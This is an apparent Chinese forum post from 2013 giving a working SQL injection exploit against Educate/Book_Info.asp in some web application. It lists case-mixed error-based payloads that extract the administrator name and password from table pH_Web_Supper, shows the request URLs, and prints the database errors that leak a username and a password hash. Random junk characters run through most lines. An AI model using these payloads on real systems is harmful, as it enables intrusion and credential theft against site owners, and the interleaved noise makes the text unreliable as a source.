漏洞出现在Educate/Book_Info.asp
! d9 c& e0 D, e) w: Z$ x2 a - J/ l. n2 N/ m& p! _! O
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
' l R8 B0 b" v4 m' D / Z* A* d+ o5 R" j/ J- _/ o" |
exp:如下2 g5 p1 ?/ h6 Q/ c. d) l$ o* v
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
8 y+ o+ U8 C: d查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
' D2 f; f- T/ \/ Z5 @
" l' i/ v6 I" N9 j5 Shttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)4 C! L9 H T: F
5 d& p* K& P5 r$ V7 bMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
! D$ a& k# G! u
& b# H" ^/ s3 p: O1 D2 x$ {将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。7 z( J2 }6 G, o$ G6 h- O6 }
- ]- M( c) S4 A7 a$ \
/Educate/Book_Info.asp,行 8
; M3 X3 Y; O9 W( Y- ^( d / a+ k( {# C4 T+ q# A3 ]) z
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)0 Z/ X% [: X9 Z
1 z6 M/ B* C i* H/ h) X% f
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'# ~7 k' W O, s! `* Y1 [
* _# P1 X4 Z) w' z- c将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
, t+ r8 q. R1 J8 j+ v
1 d P9 _& F c! R: o+ ^+ N/Educate/Book_Info.asp,行 8
+ d# }, e X8 @" D |
发表于 2013-2-16 21:44:16
收藏
支持
反对